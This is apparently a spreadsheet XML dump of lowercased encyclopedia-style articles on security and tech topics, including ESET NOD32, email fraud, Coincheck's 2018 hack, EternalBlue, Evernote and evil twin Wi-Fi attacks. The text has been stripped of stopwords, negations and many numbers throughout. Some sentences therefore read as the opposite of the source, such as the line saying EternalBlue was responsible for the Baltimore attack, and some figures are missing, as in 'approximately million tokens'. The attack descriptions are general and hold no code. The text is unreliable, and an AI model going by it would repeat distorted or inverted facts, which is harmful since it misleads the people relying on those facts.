block everipedia's fork. mike novogratz, galaxy investment cryptocurrency investment firm, block.one group institutions invested million everipedia february 2018. novogratz also funds eosio ecosystem, $325-million joint venture galaxy digital block.one. references external links official website</t>
  </si>
  <si>
    <t>ESET NOD32</t>
  </si>
  <si>
    <t>eset nod32 antivirus, commonly known nod32, antivirus software package made slovak company eset. eset nod32 antivirus sold editions, home edition business edition. business edition packages eset remote administrator allowing server deployment management, mirroring threat signature database updates ability install microsoft windows server operating systems. history nod32 acronym stands nemocnica okraji disku ("hospital disk"), related czechoslovak medical drama series nemocnice kraji města (hospital city). first version nod32 called nod-ice dos-based program. created 1987 miroslav trnka peter paško time computer viruses started become increasingly prevalent running dos. limitations (lack multitasking among others) feature on-demand/on-access protection features current versions. besides virus scanning cleaning functionality featured heuristic analysis. with increasing popularity windows environment, advent 32-bit cpus, shift market increasing popularity internet came need completely different antivirus approach well. thus original program re-written christened "nod32" emphasize radical shift previous version win32 system compatibility. initially program gained popularity workers eastern european countries, eset based slovakia. though program's abbreviation originally pronounced individual letters, worldwide program common single-word pronunciation, sounding like english word nod. additionally, "32" portion name added release 32-bit version windows era. company reached 10000th update virus definitions june 2014. mail security microsoft exchange server march 2010 eset released eset mail security microsoft exchange server, contains antimalware antispam modules. supports microsoft exchange 5.5, 2000, 2003, 2007 2010. mobile security eset mobile security replacement eset mobile antivirus, provided anti-malware antispam functionality. eset mobile security contains features older product adds anti-theft features locking remote wipe well security audit firewall. versions windows mobile symbian available september 2010, home enterprise users. remote administrator eset remote administrator central management console designed allow network administrators manage eset software across corporate network. smart security november 2007, eset released internet security suite, eset smart security version 3.0, compete security suites companies mcafee, symantec, kaspersky. eset smart security incorporates anti-spam bidirectional firewall along traditional anti-malware features eset nod32 antivirus. march 2009, eset smart security version released, adding integration eset sysinspector; support mozilla thunderbird windows live mail; self-defense module, updated firewall module, eset sysrescue wizard creating bootable flash drives. there initially compatibility problems eset smart security windows vista service pack remedied update.on august 2010, eset smart security version released features, enhancements changes.on september 2011, eset smart security version released.on january 2013, eset smart security version released. this version included anti-theft feature tracking lost, misplaced stolen laptop.on october 2013, eset smart security version released. offers enhanced operation memory scanning blocks misuses known exploits. october 2014, eset smart security version released. adds exploit blocking java botnet protection.on october 2015, eset smart security version released. sysinspector eset sysinspector diagnostic tool allows in-depth analysis various aspects operating system, including running processes, registry content, startup items network connections. anti-stealth technology used discover hidden objects (rootkits) master boot record, boot sector, registry entries, drivers, services processes. sysinspector logs standard files submitted experts analysis. logs compared find items common logs. file saved service script removing malicious objects computer. sysrescue live eset sysrescue live linux-based bootable live cd/usb image used boot clean heavily infected computers independent installed operating system. program offered free charge, download updates network connection present. other programs eset released free standalone removers malware widespread, mebroot. development file security microsoft windows server june 2010, first release candidate eset file security microsoft windows server v4.3 made available public. this program updated version eset nod32 antivirus business edition designed microsoft windows server operating systems contains revised user interface, automatic exclusions critical directories files unspecified optimizations operation servers. mobile security april 2010, eset mobile security windows mobile symbian went public beta. home edition released september 2010, january 2011, business edition went beta.on april 2011, eset beta test version android released. august 2011, release candidate made available. nod32 linux desktop december 2009, eset nod32 antivirus desktop eset nod32 antivirus linux desktop released public testing. eset stated release automatically detects cleans cross-platform malware, scans archives, automatically scans removable media flash drives mounted, performs real-time scanning, provides reports offers similar microsoft windows version. second beta test versions released january 2010, third june 2010.on september 2010, eset released eset nod32 antivirus business edition. announced release candidate eset cybersecurity september 2010, eset released release candidate eset cybersecurity january 2011, eset released release candidate eset nod32 antivirus linux desktop smart security 2011, eset released beta test version eset smart security 5.0. beta version adds parental control, cloud-based file reputation service, gamer mode, hips improvements antispam, firewall removable media control functions. june 2011, eset released release candidate eset smart security version 5.0.on august 2014, eset smart security version public beta released. offers enhanced exploit blocking botnet detection. discontinued products mobile antivirus eset mobile antivirus aimed protecting smartphones viruses, spyware, adware, trojans, worms, rootkits, unwanted software. also provided antispam filtering messages. versions windows mobile symbian available. eset discontinued eset mobile antivirus january 2011 provides eset mobile security free upgrade licensed users eset mobile antivirus. nod32 antivirus v2.7 older february 2010, eset discontinued version nod32 antivirus previous versions nod32 antivirus. they removed eset website, including product pages e-store. version last version supporting microsoft 95/98/me novell netware operating systems. virus signature database updates customer support discontinued february 2012. technical information network, nod32 clients update central "mirror server" network. reception april 2011, nod32 antivirus holds icsa labs certifications. september 2018, nod32 accumulated hundred eleven vb100 awards virus bulletin; failed receive award three times.in comparative report virus bulletin published september 2008, nod32 detected 94.4% malware 94.7% spyware. stood competitors like norton internet security zonealarm windows live onecare avira antivir. averages quadrant december 2011 june 2012, virus bulletin found eset pretty much level, 94%, noted ability block spam phishing, earning award, award antivirus companies able acquire.on april 2008, robert vamosi cnet.com reviewed version nod32 gave score 3.5/5. march 2009, seth rosenblatt download.com reviewed version nod32 gave rating 4.6/5. september 2011, seth rosenblatt cnet reviewed version nod32 gave rating 5/5. also antivirus software list antivirus software comparison computer viruses references external links official website virus radar, service eset using nod32 statistics official german eset support forum</t>
  </si>
  <si>
    <t>Coinme</t>
  </si>
  <si>
    <t>coinme u.s. licensed cryptocurrency exchange. company provides back-end technology enable financial systems, automatic teller machines (atms) coin-cashing kiosks, convert cryptocurrency cash. company launched first licensed bitcoin atms u.s. early history 2013, co-founders neil bergquist michael smyers learned world's first successful bitcoin vancouver, purchased three atms manufacturer. began working washington state department financial institutions revise state finance laws secure license operate kiosk.three pilot bitcoin kiosks situated greater seattle area. spitfire grill belltown, another startup hall university washington, third southcenter mall south seattle. bitcoin coinme formally established 2014 bergquist smyers vice president engineering. they deployed operated nearly bitcoin atms across western united states developing application programming interface (api) converting atms kiosks cryptocurrency exchanging machines.the first state-licensed bitcoin united states installed coinme spitfire grill seattle, washington spring 2014. company later installed bitcoin-enabled spokane valley mall became first licensed company state washington offer digital currency atms.coinme takes percent transaction every dollar exchanged network atms.by june 2021, coinme employed people raised million investment capital. coinme investors include xpring, blockchain.com ventures, pantera capital, digital currency group moneygram international. 2021, company latter stages completing necessary filings operate u.s. states money transfer license (mtl) holder.in january 2022 company named davis, former executive special agent, first general counsel. february 2022, brian reisbeck joined company chief compliance officer. coinstar coinstar, operator coin-converting kiosks, signed agreement coinme 2019 enable consumers purchase bitcoin existing coinstar machines. coinme-enabled coinstar machines expanded number states including connecticut, machines placed stop shop supermarkets. coinstar coinme announced october 2021 walmart would putting coinstar-enabled bitcoin kiosks stores. january 2022, 7,000 coinme-enabled coinstar kiosks operating u.s. states including alaska, pennsylvania, north carolina, florida. coinme’s partnership coinstar made largest bitcoin network north america. moneygram payments money transfer company moneygram signed agreement coinme 2021 allow customers load cash into, bitcoin wallets. select moneygram retail locations u.s. 2022, moneygram purchased stake coinme. awards rankings puget sound business journal list fastest growing private companies (2021). seattle business magazine list "100 best companies work washington state" (2021). inc. magazine list fasted growing companies (2022). built-in.com "100 best remote companies work for" (2022). references external links coinme website</t>
  </si>
  <si>
    <t>Email fraud</t>
  </si>
  <si>
    <t>email fraud email scam) intentional deception either personal gain damage another individual means email. almost soon email became widely used, began used means defraud people. email fraud take form "con game", scam. confidence tricks tend exploit inherent greed dishonesty victims. prospect 'bargain' 'something nothing' tempting. email fraud, 'bunco schemes,' usually targets naive individuals confidence schemes rich quickly. these include 'too good true' investments offers sell popular items 'impossibly low' prices. many people lost life savings fraud. forms spoofing email sent someone pretending someone else known spoofing. spoofing take place number ways. common actual sender's name origin message concealed masked recipient. many instances email fraud least spoofing, frauds clearly criminal acts, criminals typically avoid easy traceability. phishing phishing type social engineering attacker sends fraudulent (e.g., spoofed, fake, otherwise deceptive) message designed trick person revealing sensitive information attacker deploy malicious software victim's infrastructure ransomware. some spoof messages purport existing company, perhaps intended victim already business relationship. 'bait' instance appear message "the fraud department" example, victim's bank, asks customer "confirm information"; "log account"; "create password", similar requests. instead directed website trust, referred identical looking page different url. after entering log-in details, username password visible perpetrators. many cases, phishing emails appear benign example, message prompting receiver friend request social media platform. regardless innocent message itself, always lead victim imitation page false log-in prompt. bogus offers email solicitations purchase goods services instances attempted fraud. fraudulent offer typically features popular item service, drastically reduced price. items offered advance actual availability. instance, latest video game offered prior release, similar price normal sale. case, "greed factor" desire something nobody else has, everyone else rather reduction price. course, item never delivered, legitimate offer first place. such offer even phishing attempt obtain victim's credit card information, intent using information fraudulently obtain goods services, paid hapless victim, know scammed credit card "used up." requests help "request help" type email fraud takes form: email sent requesting help way. however, reward included help, acts "hook". reward large amount money, treasure, artifact supposedly great value. this type scam existed least since renaissance, known "spanish prisoner" "turkish prisoner" scam. original form, scheme purport correspondence wealthy person imprisoned false identity relying confidence artist raise money secure release. tells "mark" (victim) "allowed" supply money, expect generous reward prisoner returns. confidence artist claims chosen victim reputation honesty. other business email compromise class email fraud employees privileged access (such company finances) deceived making invalid payments installing ransomware advance-fee scam: among variations type scam, nigerian letter also called fraud, nigerian scam, nigerian bank scam, nigerian money offer. nigerian senate emblem sometimes used scam. lottery scam: intended victim often told name email address selected random computer ballot sponsored marketing company. order claim so-called winnings, victim asked provide bank account details personal information. victim asked contact claims agent award department. email: claim “official order” fbi’s anti-terrorist monetary crimes division, alleged unit nigeria, confirm inheritance, contain lottery notification, informing recipients named beneficiary millions dollars. hitman: email sent victim's inbox, supposedly hitman hired "close friend" recipient kill call exchange large money. this usually backed warning victim informs local police fbi, "hitman" forced plan. this less advance-fee fraud outright extortion, reward sometimes offered form "hitman" offering kill ordered original victim. investment schemes: emails touting investments promise high rates return little risk. version seeks investors help form offshore bank. fifth third bank brand, name, logo frequently exploited scam. computer security company mcafee reports that, beginning september 2006, phishing scam emails reported mcafee using fifth third bank's brand. romance scam: usually scam begins online dating site, quickly moved personal email, online chat room, social media site. under form, fraudsters (pretended males females) build online relationships, time, money victims. they claim money needed fact lost money luggage stolen), beaten otherwise harmed need country victim's country. dating extortion scam: after baiting individual intimate conversations, told unless want conversations posted online named cheater. there reports indicate records actually removed payment made. online business directory: typically offering free subscription non-existent directory hefty fees maintenance fine print. death certificate scam: person obituary internet. find relatives related. emails. contact fake story another family member near death, course, told ambiguous language. originates ethiopia "makelawi" email, (german free email tag) along marriage agency scam: pretending translation agency marriage agency, actually translate emails connect real brides, fabricate emails create fake profiles dating sites. they pictures real people websites. typically aimed foreign looking brides former soviet countries. when victim engaged, communication expenses translations, voice phone calls, video calls, "agency fees". they impersonate brides instead providing matchmaking service them. real ladies aware someone using identity. secret shopper: intended victim solicited email work 'secret shopper', often victim's resume posted search site. once engaged, victim sent counterfeit check along instructions forms work secret shopper. provided instructions typically make several small transactions nearby businesses, recording experience official looking form. universally instruction victim also create significant wire transfer, request rate experience. counterfeit check cashed unsuspecting victim's financial institution order accomplish listed tasks. traffic ticket spam: fraudulent emails claiming recipient issued traffic ticket. spam, spoofed nyc.gov email address, claimed york state police (nysp). word mouth: this email spam state anonymous person posted secret recipient needs order message. scams: victim seeking posts resume internet site. scammer spots resume sends victim email claiming legitimate listing service, claiming client looking employee skills experience. victim invited click link apply job. clicking link takes victim description specifically written skills experience victim's resume, provides high salary, invites "click here" apply job. victim clicks "apply" link, taken "application" form asks normal application information, plus victim's social security number, date birth, name bank account number want paycheck deposited "relative" reference, etc. with information, scammer open bank account on-line bank utilize victim's credit items online ship associates scam. paypal scam: fraudulent emails claiming victim issued payment his/her account, however processing complete victim sent item he/she selling individuals address. this scam mostly common selling items individuals abroad. avoiding email fraud widespread bugs email, simply opening email potentially alert sender address email sent valid address. this also happen mail 'reported' spam, cases: email forwarded inspection, opened, sender notified addressee opened email fraud avoided responding suspicious emails. keeping one's email address secret possible. using spam filter. noticing several spelling errors body "official looking" email. ignoring unsolicited emails types deleting them. clicking links. ignoring offers unknown sources. contents email formal binding agreement.many frauds unreported authorities, feelings shame, guilt, embarrassment. also mail wire fraud confidence trick get-rich-quick schemes internet fraud email tracking pixel references external links email scam reports</t>
  </si>
  <si>
    <t>Coincheck</t>
  </si>
  <si>
    <t>coincheck japanese bitcoin wallet exchange service headquartered tokyo, japan, founded koichiro wada yusuke otsuka. operates exchanges bitcoin, ether fiat currencies japan, bitcoin transactions storage countries.in april 2018, coincheck acquired monex group billion yen. (us33.4 million) coincheck since 2016 trademark name numismatic supply company located trademark registered united states since 2016. history coincheck started august 2014 operated coincheck, inc. (previously resupress, inc) (founded 2012). there 2,200 merchants using bitcoin payment solution, japan. coincheck member (japan blockchain association) actively helping build japanese bitcoin community's usage standards government. coincheck partnered sekai support chinese, hong kong, taiwan investors japanese real estate bitcoin. 2018 hacking incident january 2018, coincheck hacked approximately million tokens ($530 million) stolen. currency transferred total nineteen accounts, found connection hacker.the hack japan's crypto-currency trade groups merge self-regulatory organization. financial services agency took administrative action ordering coincheck improve security practices, order exchange shut concern protection users. coincheck initially announced able compensate users affected hack, announced would repay 260,000 users affected japanese using capital. february 2021, tokyo public prosecutors office charged individuals involvement transactions stolen tokens. total, individuals converted around 18.8 billion stolen coins cryptocurrencies. references</t>
  </si>
  <si>
    <t>EternalBlue</t>
  </si>
  <si>
    <t>eternalblue computer exploit developed u.s. national security agency (nsa). leaked shadow brokers hacker group april 2017, month microsoft released patches vulnerability. 2017, worldwide wannacry ransomware used exploit attack unpatched computers.: june 2017, exploit used help carry 2017 notpetya cyberattack unpatched computers.the exploit also reported used since march 2016 chinese hacking group buckeye (apt3), likely found re-purposed tool,: well reported used part retefe banking trojan since least september 2017.eternalblue among several exploits used, conjunction doublepulsar backdoor implant tool. details eternalblue exploits vulnerability microsoft's implementation server message block (smb) protocol. this vulnerability denoted entry cve-2017-0144 common vulnerabilities exposures (cve) catalog. vulnerability exists version (smbv1) server various versions microsoft windows mishandles specially crafted packets remote attackers, allowing remotely execute code target computer.the alert microsoft vulnerabilities, held five years breach forced hand. agency warned microsoft learning eternalblue's possible theft, allowing company prepare software patch issued march 2017, delaying regular release security patches february 2017. tuesday, march 2017, microsoft issued security bulletin ms17-010, detailed flaw announced patches released windows versions currently supported time, windows vista, windows windows 8.1, windows windows server 2008, windows server 2012, windows server 2016.many windows users installed patches when, months later 2017, wannacry ransomware attack used eternalblue vulnerability spread itself. next (may 2017), microsoft released emergency security patches unsupported windows windows windows server 2003.in february 2018, eternalblue ported windows operating systems since windows 2000 risksense security researcher sean dillon. eternalchampion eternalromance, exploits originally developed leaked shadow brokers, also ported event. they made available open sourced metasploit modules.at 2018, millions systems still vulnerable eternalblue. this millions dollars damages primarily ransomware worms. following massive impact wannacry, notpetya badrabbit caused billion worth damages countries, using eternalblue either initial compromise vector method lateral movement.in 2019, city baltimore struggled cyberattack digital extortionists; attack froze thousands computers, shut email disrupted real estate sales, water bills, health alerts many services. nicole perlroth, writing york times, initially attributed attack eternalblue; memoir published february 2021, perlroth clarified eternalblue responsible baltimore cyberattack, criticizing others pointing "the technical detail particular case, ransomware attack spread eternalblue".since 2012, four baltimore city chief information officers fired resigned; left investigation. some security researchers said responsibility baltimore breach city updating computers. security consultant graham wrote tweet: organization substantial numbers windows machines gone years without patches, that’s squarely fault organization, eternalblue." responsibility according microsoft, united states's responsible controversial strategy disclosing stockpiling vulnerabilities. strategy prevented microsoft knowing (and subsequently patching) bug, presumably hidden bugs. however several commentators, including alex abdo columbia university's knight first amendment institute, criticised microsoft shifting blame nsa, arguing held responsible releasing defective product manufacturer might company faulted initially restricting release eternalblue patch recent windows users customers $1,000 device extended support contracts, move left organisations uk's vulnerable wannacry attack. month patch first released, microsoft took rare step making available free users vulnerable windows editions dating back windows eternalrocks eternalrocks microbotmassivenet computer worm infects microsoft windows. uses seven exploits developed nsa. comparatively, wannacry ransomware program infected 230,000 computers 2017 uses exploits, making researchers believe eternalrocks significantly dangerous. worm discovered honeypot. infection eternalrocks first installs tor, private network conceals internet activity, access hidden servers. after brief hour "incubation period", server responds malware request downloading self-replicating "host" machine. malware even names wannacry avoid detection security researchers. unlike wannacry, eternalrocks possess kill switch ransomware. also bluekeep (security vulnerability) similar vulnerability petya (malware) references further reading grossman, nadav (september 2017). "eternalblue everything there know". external links microsoft security bulletin ms17-010 microsoft update catalog entries eternalblue patches cve-2017-0144 entry catalog</t>
  </si>
  <si>
    <t>EternalRocks worm</t>
  </si>
  <si>
    <t>Client-side encryption</t>
  </si>
  <si>
    <t>client-side encryption cryptographic technique encrypting data sender's side, transmitted server cloud storage service. client-side encryption features encryption available service provider, making difficult impossible service providers decrypt hosted data. client-side encryption allows creation applications whose providers cannot access data users stored, thus offering high level privacy. those applications sometimes marketed misleading term "zero-knowledge". details client-side encryption seeks eliminate potential data viewed service providers third parties compel service providers deliver access data), client-side encryption ensures data files stored cloud viewed client-side exchange. remaining encrypted intermediary server, client-side encryption ensures data retains privacy origin destination server. this prevents data loss unauthorized disclosure private personal files, providing increased peace mind users.current academic scholarship well recommendations industry professionals provide much support developers include client-side encryption protect confidentiality integrity information.examples cloud storage services provide client-side encryption tresorit, mega spideroak. february 2016, neither apple icloud, google drive, dropbox provide client-side encryption. also end-to-end encryption encryption data different clients communicating homomorphic encryption references</t>
  </si>
  <si>
    <t>European Medicines Agency data breach</t>
  </si>
  <si>
    <t>december 2020 european medicines agency announced targeted cyberattack. agency announced opened full investigation close cooperation enforcement entities declined give details attack investigation ongoing.in separate announcement biontech said files relating covid-19 vaccine developed pfizer unlawfully accessed cyberattack ema. biontech also said biontech pfizer systems breached connection incident unaware personal data study participants accessed."neither dates methods cyberattack revealed, perpetrators were.the national cyber security centre united kingdom announced studying situation would affect first country biontech/pfizer vaccine deployed. russia china accused march 2021 dutch newspaper volkskrant published article saying "sources close investigation" disclosed russian intelligence agency chinese spies behind attacks. references</t>
  </si>
  <si>
    <t>Eusko</t>
  </si>
  <si>
    <t>eusko local currency released "eusko moneta erakundea", number currencies active basque country. mainly used northern basque country, france. currency created 31st january 2013. features smallest value eusko eusko format, separated less amount. eusko value equal euro, price article totally paid euskos, article round price, difference paid cents. (example: article costs 3,50 euros, paid euskos euro cents) motto "euskoa denen esku", means "the eusko hands everyone". format eusko note based format enables user trade values eusko note twenty eusko note. appearance notes varies according value note: eusko note blue, image txalaparta eusko note red, scene folk dance five eusko note grey, countryside scene eusko note yellow, image blackboard basque verbs form "nor-nori-nork" twenty eusko note purple, image industrial port shows cranesseveral security systems protect notes forgery, similar ones euro has. those include: complex filigree heated gold mark marks blind people identify note value aims eusko encourage community local traders. this potentially strengthens local economy reduce ecological damage caused long supply chains. additionally, aims promote solidarity. history predecessors idea eusko starts ambes (from french association pour création d’une monnaie locale basque, ecologique solidaire) took example another currency running france, thought could profitable applicable basque country. choice name came ambes asked citizens choose name optimal currency. getting started eusko gave first steps 31st january 2013, initial number 126,500 eusko copies. from beginning eusko accepted establishments associated. according creators eusko, businesses enterprises accept eusko form paying, eusko spread 1500 users. ambes said eusko would credit card system 2015. also alternative currency fiscal localism local purchasing references pays basque. monnaie locale l’eusko, éthique utile pays basque lance propre monnaiel’eusko, monnaie basque première monnaie locale france[1]archived 2017-08-30 wayback machine external links official site: accueil</t>
  </si>
  <si>
    <t>EverRise</t>
  </si>
  <si>
    <t>everrise (rise) blockchain technology company provides security solutions across blockchains ecosystem decentralized applications. everrise multi-chain collateralized cryptocurrency serves utility token cross-chain transfers secures ecosystem holders innovative buyback staking protocol. everrise known first cryptocurrency introduce concept token buyback cryptocurrency. since launch, concept adopted several cryptocurrencies.the everrise ecosystem provides suite dapps provide security solutions projects investors defi space. january 2022, surpassed million market capitalization mark. around time also recorded percent stake total supply. references external official website</t>
  </si>
  <si>
    <t>Evernote</t>
  </si>
  <si>
    <t>evernote note-taking task management application. developed evernote corporation, headquartered redwood city, california. intended archiving creating notes photos, audio saved content embedded. notes stored virtual "notebooks" tagged, annotated, edited, searched, exported. evernote available android, ios, macos, microsoft windows, well client. free monthly usage limits, offers paid plans expanded lifted limits. company after founded 2000 russian-american computer entrepreneur stepan pachikov, evernote corporation ('evernote' stylized capital time) started marketing software windows desktop pcs, tablet handheld devices like handwriting recognition software ritepen note-taking clipping application evernote (also capital 'n'), windows application stored notes 'infinite roll paper'. under phil libin, company shifted focus web, smartphones also apple mac, starting evernote (now lower-case 'n') 2008. evernote service launched open beta june 2008 reached million users july 2011. october 2010, company raised us$20 million funding round docomo capital participation morgenthaler ventures sequoia capital. since then, company raised additional million funding sequoia capital morgenthaler ventures, another million funding meritech capital capital. november 2012, evernote raised another million funding equity partners/m8 capital valiant capital partners. november 2014, evernote raised additional million funding nikkei, inc.on 2013, techcrunch reported evernote launched yinxiang biji business chinese market global mobile internet conference.linda kozlowski named chief operating officer evernote june 2015, years company, left year.libin stepped july 2015 replaced former google glass executive chris o'neill, remained executive chairman. october 2015, evernote corp. announced company laying percent workforce would closing three global offices. september 2016, libin stepped executive chairman focus business ventures. february 2017, o'neill stated blog post business cash-flow positive. sequoia capital, evernote's equity owners, said, "it's great company starts raise non-dilutive capital every day, called revenue."in august 2018, chief technical officer anirban kundu, chief financial officer vincent toolan, chief product officer erik wrobel, head michelle wagner left company. wrobel wagner joined 2016. september 2018, employees—about percent workforce—were laid off. blog post, o'neill said, "after successful 2017, incredibly aggressive goals evernote 2018. though steadily grown, committed many resources quickly. built areas business ways proven inefficient. going forward, streamlining certain functions, like sales, continue speed scale others, like product development engineering."on october 2018, evernote announced small, former tokbox, would replace o'neill evernote. architecture coding versions 2010, programming language used write evernote's software changed version version improve performance. data entry well keyboard entry typed notes, evernote supports image capture cameras supported devices, recording voice notes. situations, text appears captured images recognized using annotated. evernote also supports touch tablet screens handwriting recognition. evernote web-clipping plugins available popular internet browsers allow marked sections webpages captured clipped evernote. section webpage highlighted, evernote clip full page. evernote also supports ability e-mail notes service, allowing automated note entry e-mail rules filters.where suitable hardware available, evernote automatically geolocation tags notes.as november 2018, evernote integrates directly google drive, microsoft outlook, microsoft teams, slack, evernote adds integration salesforce. versions evernote also support integrations ifttt zapier. 2013, evernote deprecated direct integration twitter favor third-party services. data storage access supported operating systems, evernote allows users store edit notes local machine, using sqlite database windows.users internet access evernote account also notes automatically synchronized master copy held evernote's servers. this approach lets user access edit data across multiple machines operating system platforms, still view, input edit data internet connection available. however, notes stored evernote servers encrypted. where evernote client software available, online account-holders access note archive interface media device. service also allows selected files shared viewing editing users. evernote software downloaded used "stand-alone" software without using online portion evernote account (online registration required initial setup, however), able upload files evernote server, server synchronize share files different evernote installations. also, image image-pdf (premium only) recognition indexing take place software used entirely offline. accounts evernote free online service allows users upgrade premium business accounts. free, plus premium evernote accounts maximum limit 100,000 notes notebooks.basic customers upload data month. plus customers upload limit, offline notes mobile devices, well passcode lock mobile devices. emails also sent evernote account.premium subscribers granted uploaded data every month, faster word recognition images, heightened security, annotation, context, notes news articles seen, related open note ability search text within documents. they also receive additional options notebook sharing. each free, plus premium account types allow notebook sharing evernote users; however, accounts distinguished editing capabilities. regards shared notebooks, editing permissions non-paid account holders granted premium evernote subscribers. free service make files available offline android devices; sometimes available cache, editing files cause conflicts synchronizing.with full version evernote business, users sync view work documents variety platforms, mac, iphone ipads, web, windows android devices. files uploaded include spreadsheets, presentations, notes design mock ups. addition, administrators monitor company progress individual employees admin console.in june 2016, evernote announced limitation users free basic account devices year raised prices premium service tiers. non-paying evernote users able sync notes devices. plus lets users store notes offline upload files, premium adds document-parsing features additional storage.from early april 2018, evernote plus longer available purchase; however, users currently plus subscription maintain long subscription still active. supported platforms evernote clients available android, (ipad, iphone, ipod touch), macos, microsoft windows, web. additionally, portable versions evernote available flash drives drives. there officially supported native clients linux, company provides external linux clients.there substantial variation supported features different platforms. example, possible edit rich text format sketches windows, apple macintosh possible edit rich text, view sketches. clipping support installed default internet explorer safari browsers evernote software installed windows macos. evernote web-clipping plugins available firefox, google chrome, opera, yandex browsers. evernote email-clipper automatically installed microsoft office outlook desktop version installed computer. there also thunderbird email plugin. apps tools scannable scannable captures paper quickly, transforming high-quality scans ready save share. skitch skitch free screenshot editing sharing utility ios, windows, android. permits user shapes text image, share online. images also exported various image formats. originally developed plasq, skitch acquired evernote august 2011. december 2015, evernote announced ending support skitch windows, windows touch, ios, android january 2016. evernote said continue offer skitch mac. clipper evernote clipper simple browser extension lets user capture full-page articles, images, selected text, important emails, page. partnerships blinkist book-summarizing service blinkist offers members synchronize highlighted text passages evernote. this happens notes book title book note title. deutsche telekom march 2013, evernote announced partnership deutsche telekom provide german customers free access evernote premium year. january 2014 partnership expanded additional european markets. moleskine august 2012, moleskine partnered evernote produce digital-friendly notebook specially designed pages stickers smartphone syncing. samsung samsung galaxy note phablets included free one-year subscription evernote premium. telefónica digital august 2013, york times reported telefónica digital evernote entered global partnership agreement, giving brazilian customers free access evernote premium year. under global deal telefónica users costa rica, guatemala, panama, spain also offered promotion. incidents data loss service experienced several cases losing customer data. denial-of-service attacks june 2014, evernote suffered crippling distributed denial-of-service attack prevented customers accessing information; attackers demanded ransom, evernote refused pay. denial-of-service attack august 2014, resulted brief period downtime evernote.com; service quickly restored. security breach march 2013, evernote revealed hackers gained access network able access user information, including usernames, email addresses, hashed passwords. users asked reset passwords. wake this, evernote accelerated plans implement optional two-factor authentication users. privacy controversy december 2016, evernote announced privacy policy would changing january 2017, leading claims policy allowed employees firm access users' content situations. response concerns, evernote apologised announced policy would implemented, employees would access users' content unless users opted evernote controversy late 2020, evernote released evernote v10, written scratch electron framework, replace older versions multiple platforms. some users noted much slower previous windows versions, many features removed, work default keyboard layouts, including turkish, latvian, polish, conflict hardcoded bindings. also comparison notetaking software list personal information managers references external links nevernote.sourceforge.net. official website</t>
  </si>
  <si>
    <t>EveryDNS</t>
  </si>
  <si>
    <t>everydns.net world's largest free management services, time providing services 135,000 domains, decade, ending 2011. history everydns founded june 2001 david ulevitch. january 2010, everydns purchased inc.everydns's site shut august 2011 everydns services retired september 2011. existing users offered opportunity migrate equivalent services inc. starting days prior august 2011. services everydns offered services webmasters maintain domain name services wished everydns backup existing implementations. everydns also offered dynamic resolution, axfr service, domain2web redirection. everydns supported records donators. backup services because danger distributed-denial-of-service attack domain name server, many companies outsource domain name service management companies akamai. everydns allows webmasters servers geographically distributed service free. backend everydns runs implementation daniel bernstein's tinydns. everydns uses mysql perl manage tinydns's hash tables. used render user interface, information mysql backend database. wikileaks.org controversy december 2010, everydns dropped wikileaks entries, citing ddos attacks "threatened stability infrastructure". everydns.com made following public statement: first, let’s clear, difficult issue deal opinions sides. second, everydns.net, world’s largest free managed provider, taking position content hosted wikileaks.org wikileaks.ch website, following established policies everydns.net user’s interests ahead others. lastly, regardless people actions everydns.net, know much true believe hampshire state motto, live free die. 10pm est, wednesday december 2010 24-hour termination notification email sent email address associated wikileaks.org account. addition email, notices sent wikileaks twitter chat function available wikileaks.org website. downtime wikileaks.org website resulted failure plentiful advance notice, another solution. yesterday, pursuant everydns.net acceptable policy primary hosted domains disabled. today, also accordance everydns.net acceptable policy, secondary hosted domains, including wikileaks.ch, disabled. everydns.net taking position content hosted wikileaks.org wikileaks.ch website, following established policies. everydns.net user right risk, yesterday, today tomorrow, service hundreds thousands websites depend also no-ip dyndns references external links everydns.net, official website.</t>
  </si>
  <si>
    <t>Evidence Eliminator</t>
  </si>
  <si>
    <t>evidence eliminator computer software program runs microsoft windows operating systems least windows program deletes hidden information user's hard drive normal procedures fail delete. such "cleaner" "eraser" programs typically overwrite previously allocated disk space, order make difficult salvage deleted information. absence overwrite procedures, information user thinks deleted actually remain hard drive physical space claimed another (i.e. store another file). when offered sale, program cost early $150 later. history evidence eliminator produced robin hood software, based nottingham, england, version 6.04. controversy there controversy surrounding evidence eliminator's marketing tactics. company used popup market program, including claims user's system compromised. response, robin hood software produced "dis-information page" addressing concerns. radsoft, competitor robin hood, criticised operation. legal june 2005, peter beale, "phoenix four" used evidence eliminator remove trace certain files appointment inspectors investigate collapse rover.in 2011 case, mattel, federal court found former employee used program delete information accused giving employed mattel. references</t>
  </si>
  <si>
    <t>Evil twin (wireless networks)</t>
  </si>
  <si>
    <t>evil twin fraudulent wi-fi access point appears legitimate eavesdrop wireless communications. evil twin wireless equivalent phishing scam. this type attack used steal passwords unsuspecting users, either monitoring connections phishing, involves setting fraudulent site luring people there. method attacker snoops internet traffic using bogus wireless access point. unwitting users invited attacker's server, prompting enter sensitive information usernames passwords. often, users unaware duped well incident occurred. when users unsecured (non-https) bank e-mail accounts, attacker intercepts transaction, since sent equipment. attacker also able connect networks associated users' credentials. fake access points configuring wireless card access point (known hostap). they hard trace since shut instantly. counterfeit access point given ssid bssid nearby wi-fi network. evil twin configured pass internet traffic legitimate access point monitoring victim's connection, simply system temporarily unavailable obtaining username password. using captive portals commonly used attacks evil twins captive portal. first, attacker would create fake wireless access point similar essid legitimate access point. attacker might execute denial-of-service attack legitimate access point cause offline. from clients would connect fake access point automatically. clients would portal requesting enter password, misused attackers. also karma attack, variant evil twin attack snarfing wireless security references external links "jasager karma fon". digininja.org. rogue software. "wifiphisher tool evil twin attack". 2019.attack wifi</t>
  </si>
  <si>
    <t>Ewido Networks</t>
  </si>
  <si>
